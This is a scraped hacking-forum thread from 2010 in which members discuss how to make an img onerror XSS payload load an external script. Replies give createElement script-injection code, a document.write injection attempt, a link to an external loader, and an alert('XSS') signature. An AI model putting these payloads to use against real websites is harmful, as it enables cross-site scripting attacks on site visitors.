Follow us on Twitter!
It is never to LATE to become what you never WERE.
Monday, April 21, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 24
Guests Online: 23
Members Online: 1

Registered Members: 82856
Newest Member: djtonyg
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

Loading jscript into img tag


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 18-04-10 01:09
Hello.
Does anybody know how to load a jscript into an image tag during an onerror event ?
ex: <img src="bla.jpg" onerror=\load jscript from some external site\>

Thank you


Author

RE: Loading jscript into img tag

SySTeM
Member

Your avatar

Posts: 1524
Location: England, UK
Joined: 27.07.05
Rank:
HBH Guru
Posted on 18-04-10 01:11
Pretty sure you can only use inline JavaScript, not external scripts.


img138.imageshack.us/img138/6527/sig2ak1.jpg
www.hellboundhackers.org/sig/r/2783.png

http://www.elites0ft.com/
Author

RE: Loading jscript into img tag

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 18-04-10 01:29
Actually, there is a way.

http://spysballoon.ath.cx/hack

Open error_image.html



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: Loading jscript into img tag

SySTeM
Member

Your avatar

Posts: 1524
Location: England, UK
Joined: 27.07.05
Rank:
HBH Guru
Posted on 18-04-10 01:35
You'd have to be able to create an iframe first though, unless you can use JavaScript's createElement method via the img tag also.


img138.imageshack.us/img138/6527/sig2ak1.jpg
www.hellboundhackers.org/sig/r/2783.png



Edited by SySTeM on 18-04-10 01:37
http://www.elites0ft.com/
Author

RE: Loading jscript into img tag


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 18-04-10 02:03
spyware wrote:
Actually, there is a way.

http://spysballoon.ath.cx/hack

Open error_image.html


What is http://spysballoon.ath.cx/hack/loader.php for ?


Author

RE: Loading jscript into img tag

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 18-04-10 02:05
BlaX wrote:
What is http://spysballoon.ath.cx/hack/loader.php for ?


I didn't want to bother writing RegEx so I used a loader. You can execute code without it if you use RegEx and add a <script> tag to the page.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: Loading jscript into img tag


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 18-04-10 03:44
system_meltdown wrote:
... unless you can use JavaScript's createElement method via the img tag also.

You can. IE6 (and possibly IE7) dislike when you do anything DOM-related inside the body of the doc, but no one with any sense uses that browser anymore.

Most importantly, though, you could just skip the whole iframe bit and just use DOM functions to add a script tag with the src of the external script.


Author

RE: Loading jscript into img tag

elmiguel
Member



Posts: 160
Location: Your Computer
Joined: 12.12.07
Rank:
God
Posted on 19-04-10 17:14
Couldn't you just point to local js function that imports an external one?

something like:

Code


<script type="text/javascript">
function importScript(url){
    var tag = document.createElement("script");
    tag.type="text/javascript";
    tag.src = url;
    document.body.appendChild(tag);
}
window.onload = function(){
    // imports go here
    importScript("foo.js"); // example
};
</script>







The philosophy of one century is the common sense of the next. -Fortune Cookie

I would like to thank a few friends that I have made here that helped me and deserve to be mentioned:
System_Meltdown, Futility, nvrlivenvrdie, Mastergamer, TrueHacker, S1L3NTKn1GhT, Reelix, ynori7, Demons Halo, kryptor

www.hellboundhackers.org/sig/r/24963.png

www.hellboundhackers.org/sig/hbh2.png
<script>alert('XSS');</script>
Author

RE: Loading jscript into img tag


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-04-10 18:01
Also.. Correct me if I'm wrong but if there's a XSS you can use the script tag to create variables, thus if you inject:

Code

<script type="text/javascript">
  var doc=document.open("text/html","replace");
  var txt="<html><body><script src='source here'</script></body></html>";
  doc.write(txt);
  doc.close();
 
</script>





Edit: Sorry scratch that, that closes the first script tag.. but perhaps there's a way to get around that?.. Anyway it was just an idea.




Edited by on 19-04-10 18:02
Author

RE: Loading jscript into img tag


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-04-10 12:49
elmiguel wrote:
Couldn't you just point to local js function that imports an external one?

something like:
<snip>

Obviously, loading a local js file containing a helper function would be great. Then, of course, there wouldn't be a need for an external script... especially not in the onerror event of an image.

... but this is clearly an XSS question, so no local access.

SaMTHG wrote:
I'm wrong but if there's a XSS you can use the script tag to create variables, thus if you inject:

<snip>

Edit: Sorry scratch that, that closes the first script tag.. but perhaps there's a way to get around that?

document.write is really a dinosaur nowadays. I can't think of a single reason why anyone should be using it.

The (better) alternative is using DOM functions or, at the very least, hacking something together with document.getElementById / getElementsByName / getElementsByTagName and some lazy innerHTML implementation. In the case of inserting the script tag, you pretty much have to stick to DOM functions. The loader a couple posts up illustrates the concept pretty well.